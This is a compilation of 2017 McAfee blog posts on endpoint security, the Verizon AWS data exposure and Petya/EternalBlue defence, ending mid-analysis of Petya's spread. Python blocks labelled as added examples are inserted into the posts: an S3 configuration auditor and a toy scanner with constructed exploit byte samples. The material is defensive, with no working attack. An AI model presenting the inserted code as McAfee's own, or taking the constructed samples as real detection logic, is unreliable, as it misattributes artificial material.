The good news is there are a few things users can do to stay protected from FruitFly. First off, users can protect against older variants just by updating a Mac to include the latest patch. Newer variants still require detection and prevention, which means users need to run up-to-date security products.

For McAfee customers: our solutions detect both the dropper and the sample itself for both the old and new variants. The latter is detected using our cloud technology, Artemis.

To learn more about this attack and Mac malware, follow us at @McAfee and @McAfee_Business.

City Proactively Blocks More Threats with Less Work, Saves 40 Hours Weekly with McAfee ENS https://securingtomorrow.mcafee.com/business/city-proactively-blocks-threats-less-work-saves-40-hours-weekly-mcafee-ens/ https://securingtomorrow.mcafee.com/business/city-proactively-blocks-threats-less-work-saves-40-hours-weekly-mcafee-ens/#respond Thu, 27 Jul 2017 14:00:47 +0000 https://securingtomorrow.mcafee.com/?p=76150

The post City Proactively Blocks More Threats with Less Work, Saves 40 Hours Weekly with McAfee ENS appeared first on McAfee Blogs.

The information security team for the City of Gothenburg, in a Swedish metropolitan area of 1.1 million people, felt the impact of migrating to McAfee Endpoint Security almost immediately. First and foremost, the dramatic increase in the City’s ability to detect and protect against malware saved the team a lot of time.

“We saw a sudden reduction in infections and we had much better control over our web environment thanks to the McAfee ENS Web Control module,” recalls Kenneth Hamilton, an expert system specialist who manages endpoint protection from within the City’s Security Operations Center. “ENS began blocking users from downloading suspect files off the Internet. By reducing time spent remediating after infections, we probably save 40 hours per week.”

In addition, says Hamilton, McAfee ENS made his job much easier. “The modular architecture and fact that there is only one agent instead of multiple agents on the endpoint simplifies administration,” he explains.

“The ENS GUI is also more user-friendly, simple to understand and use, and offers more administrative support tools,” he adds. Because creating rules is so much easier with McAfee ENS, Hamilton decided to create them from scratch rather than porting them from the legacy solution.

Gothenburg City also experienced improved CPU performance from the start. Since anti-malware scans use less memory, are so much faster, and occur in the background, the City’s business users are happier, which makes the security team happier. Since deploying McAfee ENS, the City’s help desk receives only one to two calls a week—out of 35,000 users.

Hamilton sees no reason not to migrate from McAfee VirusScan Enterprise to McAfee ENS as soon as possible. “I can find only benefits from migrating to ENS, despite my searching for downsides,” he says. “The new functionality, improved performance, and advanced protection make migration a no-brainer in my opinion. Plus migration was easy and painless.”

Painless Migration from McAfee VirusScan Enterprise

Gothenburg migrated 35,000 desktops across all city departments to McAfee ENS. Most of the nodes migrated from McAfee VirusScan Enterprise to the McAfee ENS Threat Prevention module and added the ENS Web Control module. Some desktops also received the ENS firewall module, which provides improved Host Intrusion Prevention (HIPS). Migration of all 43 departments took one month from start to finish, including one week of planning and communications.

“We had been afraid that users would complain that the migration to ENS was hindering them or slowing down their computers, but only two people out of 35,000 complained—about not being able to access an unapproved website,” says Hamilton. “It was a pain-free installation all around.”

Protecting Both Physical and Virtual Endpoints

Using the McAfee ePolicy Orchestrator® (ePO™) central console, Hamilton can apply the same policies across endpoints, whether physical or virtual. Incorporating eight hypervisors, the City’s implementation of McAfee Management for Optimized Virtual Environments (MOVE) Antivirus protects 900 virtual servers, some with agents and others without, across two data centers. These servers manage a wide range of applications spanning city departments. Hamilton is also piloting using McAfee ENS in the City’s virtualized environment and has been pleased with initial results.

With both physical and virtual endpoints managed from ePO and superior protection from McAfee ENS, the City of Gothenburg is proactively blocking ransomware and other threats with less work. Since additional security components such as McAfee Threat Intelligence Exchange and McAfee Advanced Threat Defense (ATD) can easily be managed from that same ePO console, and since endpoint protection can now leverage the McAfee Data Exchange Layer (DXL), the City of Gothenburg has truly laid the foundation for a robust, adaptive threat defense lifecycle that safeguards city operations and citizens’ data.

 

To read the City of Gothenburg full case study, click here. Get your questions answered by tweeting @McAfee_Business.

OpenDXL.com goes live! Join the movement. https://securingtomorrow.mcafee.com/business/opendxl-com-goes-live-join-the-movement/ https://securingtomorrow.mcafee.com/business/opendxl-com-goes-live-join-the-movement/#respond Wed, 26 Jul 2017 04:02:53 +0000 https://securingtomorrow.mcafee.com/?p=76301

The post OpenDXL.com goes live! Join the movement. appeared first on McAfee Blogs.

This blog was written by Barbara Kay.

Please help us celebrate the birth of the newest dedicated open source project site: OpenDXL.com. As the focal point for the OpenDXL community, it provides a forum for developers and enterprises to exchange ideas, get help and contribute suggestions, share and research integrations, and find training and other resources. When you want to imagine, discover, build, deploy, or discuss services for the Data Exchange Layer (DXL) communications fabric, it has everything you want.

This site is for developers, integrators, and fans of OpenDXL. It features more than 30 new integrations from individuals and commercial software vendors. There’s a developer’s guide, a submission guide, and a cool bootstrapper utility (to make easy integration even easier). Please visit to:

  • Read and research.
  • Contribute ideas, comments, and answers.
  • Submit a new integration.
  • Connect with members.

And OpenDXL.com is just getting started. Next, the team will launch a competition for a new logo – you can weigh in on the ones a professional design team created, or up the stakes by contributing your own. You will want to visit often: every week, more integrations will be posted, so perhaps you can publish yours or use one instead of writing your own. Tip: be sure to check for new wrappers; they seem to be sprouting for every API.

OpenDXL is the easy and open way for the industry to integrate data and actions for real-time security operations. OpenDXL.com contains the list of solutions regardless of where they are hosted. It complements github.com/opendxl, where the OpenDXL open source code and solution code repositories live. Visit and say “happy birthday!” to www.opendxl.com.

News from Black Hat: Humans Collaborate and Team with Machines to Work Smarter https://securingtomorrow.mcafee.com/business/news-black-hat-humans-collaborate-team-machines-work-smarter/ https://securingtomorrow.mcafee.com/business/news-black-hat-humans-collaborate-team-machines-work-smarter/#respond Wed, 26 Jul 2017 04:02:08 +0000 https://securingtomorrow.mcafee.com/?p=76305

The post News from Black Hat: Humans Collaborate and Team with Machines to Work Smarter appeared first on McAfee Blogs.

This blog was written by Barbara Kay.

Work smarter, not harder. I’ve always liked that mantra (I told my mom I wasn’t procrastinating: I was planning!), and this approach is especially needed in security operations. Today at Black Hat, McAfee announced a wealth of ways we are helping analysts and administrators get more value out of their investments, both in technology and in operating approaches.

“Human-machine teaming” is the core concept. It represents a responsible place in the continuum between fully automated and fully manual processes. In truth, there are no totally automated or totally manual processes. The most fully automated example is a countermeasure permitted to make decisions without a human in the loop. We allow this action after people have defined the scope and impact of the system’s decisions, and we have confidence that machines can implement these steps reliably and consistently. I think of this as empowered automation.

The best “fully manual” examples might be threat hunters and security architects, who use tools to facilitate free-form processes and enrich decisions informed by experience. These experts use machines surgically and thoughtfully, driving the right applications of automation while respecting the unique contribution and value of the individuals.

In the threat hunter report released today, “Disrupting Disruptors” we found that the most advanced organizations use a balance of manual and automated processes, and are twice as likely to automate investigation processes as less mature organizations. This is human-machine teaming in action.

McAfee product innovations are helping organizations move up the maturity curve with more machine learning, automated analytics, and better information access and visualizations for the humans who need to make decisions. Through OpenDXL.com and new industry partnerships, we’ve also improved the options for humans to work together, ensuring the most creative and effective uses of machines in the cybersecurity fight.

Highlights:

  • Enhanced Machine Learning Malware Detection: The newly released McAfee Advanced Threat Defense (ATD) 0 introduces an innovative deep learning technique to enhance malware analysis, resulting in an expanded ability to identify malicious markers that may be hidden, or not fully executed.
  • Expanded, Closed-Loop Detection-to-Protection for Email: McAfee ATD Email Connector now enables email security gateways to forward suspicious attachments to McAfee ATD for analysis, preventing malware from spreading on internal networks.
  • Integrated Cloud Threat Detection: New integration between McAfee Cloud Threat Detection (CTD) and McAfee Threat Intelligence Exchange (TIE) enables McAfee Endpoint Security (ENS) to easily forward suspicious samples to a cloud sandbox for in-depth analysis.
  • Accurate Insight into Exposure and Risk, including Office 365: McAfee Enterprise Security Manager 10.1, our updated SIEM solution, now improves risk assessment by factoring in active, relevant countermeasures and priority guidance, providing a more accurate understanding of exposure and potential impact. The new Asset Threat Risk Content Pack 2.0 feature delivers security configuration, compliance posture and patch assessment in a single view. Easy incorporation of Microsoft Office 365 actions and events enables monitoring and analysis of user activity within cloud services.
  • Rapid SOC Use Case Deployment: The new McAfee Connect content portal simplifies access to freely available, simple to deploy use cases and solution integrations for use with McAfee Enterprise Security Manager. Through the portal, McAfee customers can find tools to activate monitoring, detection and incident management tasks, including user behavior analysis and detection of malware exploits and reconnaissance.
  • Simplified, faster, estate-wide Data Loss Prevention: McAfee Data Loss Prevention (DLP) Endpoint, DLP Prevent, DLP Discover and DLP Monitor are now fully unified. Unified policy management builds upon a common classification engine, dictionaries, regex engine and syntax. Streamlined incident and case management speeds investigation and remediation of risk or suspicious user behavior, and common file, email, web traffic and database analysis across endpoint and network DLP ensures consistent enforcement of corporate data usage policies.
  • New, independent open source community, OpenDXL.com: A forum, app marketplace, and new utilities and developer resources encourage enterprises, developers, and integrators to take advantage of the speed and simplicity of OpenDXL integrations and the Data Exchange Layer (DXL) communication fabric.
  • 14 New Security Innovation Alliance partners: McAfee is proud to welcome more of today’s and tomorrow’s industry leaders to our partnership program, including representatives of the network, monitoring, analytics, and orchestration markets.


AGAT Software

Cisco Systems

Extreme Networks

Gigamon

HPE

Identiv

Juniper Networks

Kemp Technologies

Lumeta

Resolve Systems

Siemplify

SkyFormation


Read the press release, visit us in Booth 300 at Black Hat, and learn more about human-machine teaming here.

McAfee MOVE AntiVirus Multiplatform Deployment Just Got a Lot Easier
https://securingtomorrow.mcafee.com/business/cloud-security/mcafee-move-antivirus-multiplatform-deployment-just-got-lot-easier/
Fri, 21 Jul 2017 00:53:55 +0000

This blog post was written by Teresa Wingfield.

McAfee Management for Optimized Virtual Environments AntiVirus (McAfee MOVE AntiVirus) optimizes security for virtual desktops and servers. Version 4.6 became available on July 18, 2017. One of the major enhancements offered by this release is dramatic simplification of the multiplatform deployment process. McAfee MOVE AntiVirus 4.6 automates the deployment of the Security Virtual Machine (SVM) Manager, SVM and clients, reducing manual clicks by 70%!

Here’s a quick walk-through of the new streamlined deployment steps:

Step 1: Installation of the software extensions and product packages required to install McAfee MOVE AntiVirus components on McAfee ePolicy Orchestrator (McAfee ePO), or to deploy them to virtual systems, is now a single click. No more separate downloads.

Step 2: As in previous versions of McAfee MOVE AntiVirus, you register your VMware vCenter account with McAfee ePO.

Step 3: Configuration and deployment of the SVM Manager are now consolidated into one step using a single Meta Package.

Step 4: You review your McAfee MOVE AntiVirus deployment status.

Step 5: Next, you deploy the McAfee MOVE AntiVirus client. The client automatically runs the European Institute for Computer Antivirus Research (EICAR) test, so you no longer need to log into the MOVE client and the MOVE SVM to check connection status, and you don’t need to run separate EICAR tests.

Step 6: The SVM deployment starts automatically. Deployment of SVM load balancing is also automatic.

Error codes for all six steps are now automatically generated and displayed in the status during installation to make diagnosing issues much easier.

Learn More

McAfee MOVE AntiVirus 4.6 includes a number of additional enhancements, including the ability to block more threats in multiplatform deployments with improved threat intelligence. Check out the release notes for more details.

How a Misconfigured AWS Server Exposed Verizon Customers’ Data
https://securingtomorrow.mcafee.com/business/misconfigured-aws-server-exposed-verizon-customers-data/
Tue, 18 Jul 2017 15:00:16 +0000

When there’s a technical issue, telecom customers often call a support line and ask for assistance, providing personal information when necessary to resolve the problem. However, what customers don’t know is that the personal data they share over the phone could be potentially susceptible to a cyberattack, depending on where it’s stored after the call is done. Verizon customers are now dealing with exactly this, as it’s been discovered that a misconfigured AWS server has exposed customer data that was recorded during support calls.

This data, which is from support calls that occurred in the past six months, includes the names, street and email addresses, phone numbers, and account PINs of over 14 million Verizon customers. Of all of this data, the exposed PINs are the most concerning, since a PIN can give cybercriminals direct access to a customer’s account – and potentially to individual phone accounts, which could be used to compromise two-factor authentication.

So, how exactly was this security gap created? A basic setting, access control, was not applied to the cloud instance in AWS, essentially leaving the data out in the open. Encryption should also have been applied to the storage volume within AWS. This server was operated by a third-party vendor called Nice Systems, who managed Verizon’s customer service operations. In this situation, Verizon wasn’t fully aware of the security gaps present in cloud infrastructure containing their customer data.

That’s why it’s important that organizations use a cloud workload protection solution: with one, they can discover workloads in the cloud they don’t know about (as long as they have overarching account credentials), immediately see those workloads’ security settings, and use that information to apply new policy where necessary. If a cloud workload protection solution had been in place, Verizon could have required that Nice Systems adjust security settings and provide the telecom with an audit report of the cloud servers that hold its data, allowing it to take any security action necessary.
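The two gaps the post names, a missing access control and missing encryption at rest, are settings that can be checked programmatically. The following is an added example, not code from the post or from McAfee; it assumes the exposed store was an S3 bucket (the post only says “cloud instance” and “storage volume”), consumes dicts shaped like the boto3 responses of get_bucket_acl, get_public_access_block and get_bucket_encryption, and uses constructed bucket settings so it runs offline:

```python
"""Added example (not from the post or from McAfee): check S3 bucket settings for
the two gaps the post describes, missing access control and missing encryption
at rest. It consumes dicts shaped like the boto3 responses of get_bucket_acl,
get_public_access_block and get_bucket_encryption, so it runs offline on the
constructed data below; audit_live() wires the same check to a real account."""
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Grantee URIs that make a bucket readable by everyone or by any AWS account.
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}


@dataclass
class BucketFinding:
    bucket: str
    public_grants: List[Tuple[str, str]] = field(default_factory=list)  # (URI, permission)
    public_access_block: bool = False  # S3 Block Public Access (an AWS feature added in 2018)
    sse_algorithm: Optional[str] = None

    @property
    def exposed(self) -> bool:
        # A public ACL grant only takes effect when no Block Public Access setting masks it.
        return bool(self.public_grants) and not self.public_access_block

    def issues(self) -> List[str]:
        out = []
        if self.exposed:
            out.append("public ACL grant without public access block")
        if self.sse_algorithm is None:
            out.append("no default server-side encryption")
        return out


def evaluate_bucket(name, acl, pab=None, encryption=None) -> BucketFinding:
    """pab / encryption are None when the API raised NoSuchPublicAccessBlockConfiguration
    or ServerSideEncryptionConfigurationNotFoundError, i.e. nothing is configured."""
    grants = [(g["Grantee"]["URI"], g["Permission"]) for g in acl.get("Grants", [])
              if g["Grantee"].get("Type") == "Group" and g["Grantee"].get("URI") in PUBLIC_GROUPS]
    cfg = (pab or {}).get("PublicAccessBlockConfiguration", {})
    blocked = bool(cfg.get("BlockPublicAcls")) and bool(cfg.get("IgnorePublicAcls"))
    rules = (encryption or {}).get("ServerSideEncryptionConfiguration", {}).get("Rules", [])
    sse = rules[0]["ApplyServerSideEncryptionByDefault"]["SSEAlgorithm"] if rules else None
    return BucketFinding(name, grants, blocked, sse)


# Constructed settings: the weak configuration the post describes beside a hardened one.
OWNER = {"Grantee": {"Type": "CanonicalUser", "ID": "owner-id"}, "Permission": "FULL_CONTROL"}
ALL_USERS_READ = {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
                  "Permission": "READ"}
SAMPLE_BUCKETS = {
    "weak-support-recordings": dict(
        acl={"Owner": {"ID": "owner-id"}, "Grants": [OWNER, ALL_USERS_READ]},
        pab=None,          # nothing masks the public grant
        encryption=None,   # no default encryption
    ),
    "hardened-support-recordings": dict(
        acl={"Owner": {"ID": "owner-id"}, "Grants": [OWNER]},
        pab={"PublicAccessBlockConfiguration": {"BlockPublicAcls": True, "IgnorePublicAcls": True,
                                                "BlockPublicPolicy": True, "RestrictPublicBuckets": True}},
        encryption={"ServerSideEncryptionConfiguration": {"Rules": [{"ApplyServerSideEncryptionByDefault": {
            "SSEAlgorithm": "aws:kms", "KMSMasterKeyID": "alias/support-data"}}]}},
    ),
}


def audit_samples(buckets=SAMPLE_BUCKETS) -> dict:
    """{bucket name: issues} for the constructed settings above."""
    return {name: evaluate_bucket(name, **cfg).issues() for name, cfg in buckets.items()}


def audit_live(profile_name=None) -> dict:
    """Same check against a real account; needs boto3 and credentials able to read bucket settings."""
    import boto3
    from botocore.exceptions import ClientError
    s3 = boto3.session.Session(profile_name=profile_name).client("s3")
    findings = {}
    for b in s3.list_buckets()["Buckets"]:
        name = b["Name"]
        responses = {}
        for key, call in (("pab", s3.get_public_access_block), ("encryption", s3.get_bucket_encryption)):
            try:
                responses[key] = call(Bucket=name)
            except ClientError:  # not configured
                responses[key] = None
        findings[name] = evaluate_bucket(name, s3.get_bucket_acl(Bucket=name), **responses).issues()
    return findings
```

Bucket policies can also grant public access and are not covered by the ACL check above; a production audit would read get_bucket_policy_status as well.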

It’s important for companies using cloud services, like AWS, to remember that they aren’t exempt from applying security to their own infrastructure. It’s a shared responsibility, which Amazon outlines here.

This shared responsibility and the relationships organizations have with third-party vendors are especially important to keep top of mind as regulators begin passing legislation that imposes specific data privacy requirements for companies, such as the E.U.’s General Data Protection Regulation (GDPR). If a company stores any data on European citizens in the cloud, it should ask those providers specific questions to help ensure they comply and, of course, do so consistently using a cloud workload protection solution.

For more information on this incident and others like it, follow us at @McAfee and @McAfee_Business.

The information provided on this GDPR page is our informed interpretation of the EU General Data Protection Regulation, and is for information purposes only; it does not constitute legal advice or advice on how to achieve operational privacy and security. It is not incorporated into any contract and does not commit, promise or create any legal obligation to deliver any code, result, material, or functionality. Furthermore, the information provided herein is subject to change without notice, and is provided “AS IS” without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance. If you require legal advice on the requirements of the General Data Protection Regulation, or any other law, or advice on the extent to which McAfee technologies can assist you to achieve compliance with the Regulation or any other law, you are advised to consult a suitably qualified legal professional. If you require advice on the nature of the technical and organizational measures that are required to deliver operational privacy and security in your organization, you should consult a suitably qualified privacy professional. No liability is accepted to any party for any harms or losses suffered in reliance on the contents of this publication.

Preventing the Next Petya: Block New Exploits by Defending Old Vulnerabilities
https://securingtomorrow.mcafee.com/business/preventing-next-petya-block-new-exploits-defending-old-vulnerabilities/
Mon, 17 Jul 2017 20:41:46 +0000

This blog was written by Nat Smith.

For ransomware enthusiasts, the April release of stolen NSA Windows exploits is a gift that will not stop giving. Just weeks after the Shadowbrokers’ “Lost in Translation” file drop, WannaCry brought havoc and destruction to networks worldwide. Now a new Petya variant is using the same EternalBlue exploit—plus some newly weaponized Windows admin tools—to ransack local subnets. Like WannaCry, it encrypts the files on a compromised system, but then it encrypts the master boot record as well, rendering the machine useless. Analysts are still debating New Petya’s origin and intent, but there is complete consensus on one point: there will be more EternalBlue-enabled ransom attacks, and soon. By some estimates up to a million older Windows servers remain unpatched for the EternalBlue SMBv1 vulnerability.

One positive takeaway is that there is really no reason to panic. We already have the tools to defeat the next Petya, and the next anything else, because most new threats target a very small number of vulnerabilities, most of them known. According to Gartner’s Craig Lawson, 431,000,000 net-new malware samples were identified in 2015.[1] Yet all of that year’s major ransomware attacks targeted just 36 vulnerabilities. When new threats recycle old exploits, we have the tools to defeat them. Consider two examples.

Vulnerability-based signatures – Unlike the exploit-based signatures used by many firewalls, which attempt to identify the fingerprint of a known attack, vulnerability-based signatures look for behaviors that indicate a known vulnerability is being exploited. To block all the new ransomware variants in 2016, you would need 357,000,000 exploit-based signatures. To block all those same ransomware attacks on known vulnerabilities, you would use only 126 vulnerability-based signatures. That is why the overwhelming majority of McAfee Network Security Platform signatures are vulnerability-based and have been for more than 15 years.

Network Security Platform already had six vulnerability-based signatures that allowed it to detect and prevent Petya the day it was released, as well as any new attack that tries to exploit the same vulnerabilities. Network Security Platform customers were protected without having to scramble to upload the latest signature file from the vendor. These vulnerabilities include:

  • 0x43c0b800 – NETBIOS-SS: Windows SMBv1 identical MID and FID type confusion vulnerability (CVE-2017-0143)
  • 0x43c0b400 – NETBIOS-SS: Windows SMB Remote Code Execution Vulnerability (CVE-2017-0144)
  • 0x43c0b500 – NETBIOS-SS: Windows SMB Remote Code Execution Vulnerability (CVE-2017-0145)
  • 0x43c0b300 – NETBIOS-SS: Microsoft Windows SMB Out of bound Write Vulnerability (CVE-2017-0146)
  • 0x43c0b900 – NETBIOS-SS: Windows SMBv1 information disclosure vulnerability (CVE-2017-0147)
  • 0x451e3300 – HTTP: Microsoft Office OLE Arbitrary Code Execution Vulnerability (CVE-2017-0199)
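To make the contrast between the two signature styles concrete, here is an added example, not code from the post or from Network Security Platform. It implements both styles over a constructed toy request format that stands in for SMBv1; the format, opcode, buffer size and sample traffic are all invented for illustration, and the point it shows is that one vulnerability-based rule covers every variant while an exploit-based rule covers only the bytes it was written for:

```python
"""Added example (not from the post or from Network Security Platform): the two
signature styles the post contrasts, implemented over a constructed toy request
format that stands in for SMBv1. The format, opcode, buffer size and traffic are
invented for illustration."""
import struct
from dataclasses import dataclass
from typing import Callable, Dict, List

MAGIC = 0x5A        # constructed header byte
OP_WRITE = 0x04     # constructed opcode whose handler copies the payload
SAFE_BUFFER = 64    # the toy server copies into a 64-byte buffer (the "vulnerability")


@dataclass
class Request:
    opcode: int
    declared_len: int
    payload: bytes


def parse_request(raw: bytes) -> Request:
    """Wire format: magic(1) opcode(1) declared_len(2, big-endian) payload(...)."""
    if len(raw) < 4 or raw[0] != MAGIC:
        raise ValueError("not a toy request")
    return Request(raw[1], struct.unpack(">H", raw[2:4])[0], raw[4:])


def build(opcode: int, declared_len: int, payload: bytes) -> bytes:
    return bytes([MAGIC, opcode]) + struct.pack(">H", declared_len) + payload


@dataclass
class Signature:
    name: str
    kind: str                                   # "exploit" or "vulnerability"
    matches: Callable[[bytes, Request], bool]


# Exploit-based: the byte fingerprint of one known attack (here, its 8-byte NOP sled).
EXPLOIT_SIG = Signature("known-overflow-exploit-bytes", "exploit",
                        lambda raw, req: b"\x90" * 8 in raw)
# Vulnerability-based: the condition that triggers the flaw, whatever the bytes look like.
VULN_SIG = Signature("write-declared-len-exceeds-buffer", "vulnerability",
                     lambda raw, req: req.opcode == OP_WRITE and req.declared_len > SAFE_BUFFER)

# Constructed traffic: the original exploit, a re-encoded variant, and two benign requests.
SAMPLES: Dict[str, bytes] = {
    "exploit_v1": build(OP_WRITE, 200, b"\x90" * 16 + b"A" * 184),
    "exploit_v2": build(OP_WRITE, 300, bytes([0x41, 0x90] * 150)),  # sled broken up, same flaw
    "benign_write": build(OP_WRITE, 32, b"hello world".ljust(32, b"\x00")),
    "benign_read": build(0x02, 300, b""),  # large length, but opcode 2 never reaches the copy
}


def scan(signatures: List[Signature], traffic: Dict[str, bytes] = SAMPLES) -> Dict[str, List[str]]:
    """Return {sample name: names of the signatures that fired}."""
    results = {}
    for name, raw in traffic.items():
        req = parse_request(raw)
        results[name] = [s.name for s in signatures if s.matches(raw, req)]
    return results
```

Running scan([EXPLOIT_SIG, VULN_SIG]) shows exploit_v2 evading the exploit-based rule while the single vulnerability-based rule catches both variants and neither benign request.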

Application controls for servers – Host-based application controls use various methods to regulate the services and processes that are allowed to execute on a workload or server. McAfee Application Control enforces three such methods: whitelists (of applications and approved updaters), reputation, and sandbox verification of safety. On a server secured with McAfee Application Control, the Petya malware payload or a variant (a Windows DLL) would be shut down the moment it tried to launch, with no impact on the workload’s availability or performance. Again, McAfee Application Control customers would not have been compromised by Petya even if they were the first target. Instead of trying to protect against every new variant of malware that may present itself, security focuses on what is supposed to run.

It is not that hard to block new exploits on known vulnerabilities. Patch the ones that are under attack. Do it NOW; there are not that many. Put IDS/IPS on your networks. Not just at the perimeter, but on the inside to protect your virtualized workloads, where it can see your east-west traffic. Put application control on your servers to smother and starve any malware that evades your other defenses.

Don’t be the deer in the headlights. You’ve got this!

[1] Gartner Event Presentation, Magic Quadrant for Intrusion Detection and Prevention Systems, Craig Lawson, Gartner Security & Risk Management Summit, 12–15 June 2017, National Harbor, MD

The Machines Are Coming. And That’s a Good Thing.
https://securingtomorrow.mcafee.com/business/machines-coming-thats-good-thing/
Thu, 13 Jul 2017 04:01:16 +0000

This blog post was written by Raja Patel.

There have been a lot of press articles recently with titles like “Robots are Coming for Your Job” and “Will Artificial Intelligence Be the Fall of Humankind?”, etc. Most predictions of the future inevitably turn out to be wrong (or, as Yogi Berra said, “The future isn’t what it used to be.”).

Science fiction aside, there is one area where automated help is wanted and needed: cybersecurity. Cyber threats are coming fast and furious. So much so that these unwanted visitors could seriously impact the progress of the Digital Age. Do we need more people to combat this problem? Yes. Many more people are needed. So much so that a recent issue of a business publication named “Cybersecurity Expert” as one of nine “future proof” jobs.

But it’s not just a question of throwing more and more people at the problem. Or of software developers working overtime to perfect yet another standalone cybersecurity widget. The onslaught of malware and new permutations like ransomware simply evolve too fast. The industry needs help, and it will come from automation. McAfee recently commissioned research on the current state of machine intelligence as it relates to endpoint security: “Machine Learning Raises Security Teams to the Next Level”. I urge anyone who is seriously interested in cybersecurity to check it out. It makes clear that machine learning is needed, but is not a replacement for people – it’s an adjunct to the job people are already doing.

The Limits of Machine Learning

As much as we need machines, it’s important to remember what they can and cannot do:

Machine learning can: detect patterns hidden in the data at rapid speeds; increase this accuracy as more data feeds its algorithms; analyze results when a breach has occurred; and keep up with a large volume of routine attacks.

Machine learning cannot: initiate creative responses; understand the Big Picture; communicate threats across disparate organizations and systems; or anticipate the threat arc of new human adversaries.

Machine learning is only as good as the algorithm it was “trained on.” Machine learning can’t exist without humans.

Machine learning makes security teams better. It means they are better informed and can make better decisions. As new threats are introduced, human security teams alone cannot sustain the volume, and machines alone cannot issue creative responses. Human-machine teams make cyber security more effective without draining performance or inhibiting the user experience.

ML + Endpoint

Machine learning allows endpoint security to continually evolve to stop new attack tactics. One of the challenges for IT operations is that endpoints are not sheltered in the datacenter, where they can be surrounded by layers of security defenses under the vigilance of security teams. Endpoints are constantly on the move, in and out of the network.

Thus, endpoint security is in a constant state of stepwise refinement, embracing new prevention techniques to stop new tactics. Machine learning is a natural extension to other malware-prevention methods and the constant back-and-forth conflict with hackers and attackers.

However, locating machine learning in the client alone is not the whole answer. There are those who believe that client-based solutions are the best way to stop malware before it starts running. Others claim ML should be based in the cloud, where the experiments of the bad guys can be analyzed.

McAfee does not subscribe exclusively to either — we think ML should cover both. In short, an integrated solution is the only way to be fully protected.

It’s also important to remember that machine learning is just one element of a successful Endpoint strategy.

Beyond Endpoint

Finally, though there is currently a lot of press and attention on ML at the endpoint, machine learning is not just for endpoint; it is a valuable tool that can be used across many aspects of cyber security. McAfee uses machine learning and other unsupervised learning algorithms across our portfolio, from Advanced Threat Defense (ATD) and Security Information and Event Management (SIEM) to URL Classification Systems and in the Gateway.

Conclusion

If a security analyst requires 15 minutes to investigate and clear a security alert, then that person can only process about 30 alerts per day. This formula dooms security teams into unsustainable reactionary patterns, and it fails to allow security personnel to develop problem-solving skills. Attackers use automated practices to discover what works and then relaunch tactics for maximum effect. The best way for security teams to get ahead in this game is to allocate time for people to use their intelligence and creativity to enhance security practices, and to leverage efficiencies gained from machine-learning technology to make that time.

Machine learning in cybersecurity is here, and that’s a good thing. It is a critical component of any enterprise endpoint security strategy. Given the volume and evolution of attacks hammering away at endpoints, security must be able to adapt without human intervention, and must provide the visibility and focus to enable humans to make more informed decisions. So, look at that “robot” as performing the routine stuff – and allowing the human to soar.

Migrate to the New McAfee Endpoint Security (ENS)
https://securingtomorrow.mcafee.com/business/endpoint-security/migrate-new-mcafee-endpoint-security-ens/
Thu, 06 Jul 2017 16:00:08 +0000

The traditional IT model of waiting for early adopters to work through any bugs before you install new software makes sense in many cases. In cybersecurity, however, each day’s delay extends the window of opportunity for zero-day malware to wreak havoc on your endpoints.

During the recent Wannacry ransomware attack, customers running the latest McAfee Endpoint Security with Advanced Threat Protection never had a hiccup. Their endpoints immediately classified the file as greyware, subject to deeper analysis and containment. Like border collies so smart they don’t need a command, McAfee Dynamic Application Containment herded unknown files away from crucial areas, allowing them to run but not take actions that malware typically attempts—like encrypting files or overwriting directories.

All of this happened in seconds, without human intervention, and without waiting for a signature. While some organizations scrambled to contain a massive outbreak, McAfee Endpoint Security customers continued working as usual. Even if the attack made it onto an endpoint, it was severely limited in any damage it could cause to that endpoint or user. And with McAfee Threat Intelligence Exchange, the first endpoint to get hit communicated with every other system in the environment.

Stay Current, Stay Protected

Cases like this prove you can’t afford to wait. While signature-based security still plays an important role in endpoint security, it now functions best when used as part of a multi-layer defense, filtering out less sophisticated, “commodity” malware. Signature-based defenses depend on the endpoint security vendor identifying a new attack and creating a DAT file so endpoints can block it. Even when vendors discover a new threat immediately, it still takes hours or days to create and distribute that signature. And during that gap, thousands—even millions—of endpoints can get hit.

The more advanced modern malware threats, however, are designed to disguise their nature and exploit the windows of vulnerability that signature-only defenses leave open. That’s why the industry is moving to next-generation, signature-less approaches.

Move to the Latest McAfee Endpoint Security

With the latest McAfee Endpoint Security, you don’t have to wait for a signature. If an executable has never been seen before, your endpoints automatically classify it as “greyware” and treat it with appropriate suspicion. Your endpoints first conduct pre-execution scanning of its code base—essentially a static look at the code (before it runs). Then, they perform dynamic analysis of the behavior during execution. All of these capabilities, and others, are part of protection at each endpoint that limits the damage and spread of greyware to other endpoints. And they’re designed and integrated to close that window of vulnerability—to stop malware even before security systems know exactly what it is.

Learn More

No matter who your endpoint security vendor is, check to see if you’re running their latest software version—and if not, update it. Hint: If you’re running VirusScan Enterprise (VSE), McAfee Host IPS Firewall, or McAfee SiteAdvisor web filtering, you’re not using the latest McAfee Endpoint Security.

McAfee Endpoint Security is an integrated solution that replaces several individual legacy endpoint products, including McAfee VirusScan Enterprise, McAfee Host IPS Firewall, and McAfee SiteAdvisor web filtering. If you’re an existing customer with one of our Endpoint Security suites, McAfee Endpoint Security is a free security upgrade.

Learn more about migrating to the latest McAfee Endpoint Security

New Variant of Petya Ransomware Spreading Like Wildfire
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-variant-petya-ransomware-spreading-like-wildfire/
Tue, 27 Jun 2017 19:44:27 +0000

[This post was updated on June 27 at 18:40 Pacific time. The updated section is marked.] 

The world woke up today to another ransomware outbreak wreaking havoc throughout companies’ networks. This time, the family causing the fuss is Ransomware Petya, a nasty variant that encrypts files and the computer’s master boot record (MBR), rendering the machine unusable.

Ransomware Petya has been around since at least March 2016 and differs from usual ransomware families because it encrypts a system’s MBR in addition to encrypting files. This double stroke renders the disk inaccessible and prevents most users from recovering anything on it.

The new variant found today has further increased its nastiness by adding a spreading mechanism similar to what we saw in WannaCry just a few weeks ago. Petya comes as a Windows DLL with only one unnamed export, and uses the same EternalBlue exploit when it attempts to infect remote machines, as we can see below:

In the preceding image we can see the typical transaction occurring right before the exploit is sent—as we discussed in our WannaCry blog.

Once the exploit succeeds, the malware copies itself to the remote machine under C:\Windows and starts itself using rundll32.exe. The process is executed under lsass.exe, the Windows process injected by the EternalBlue exploit.

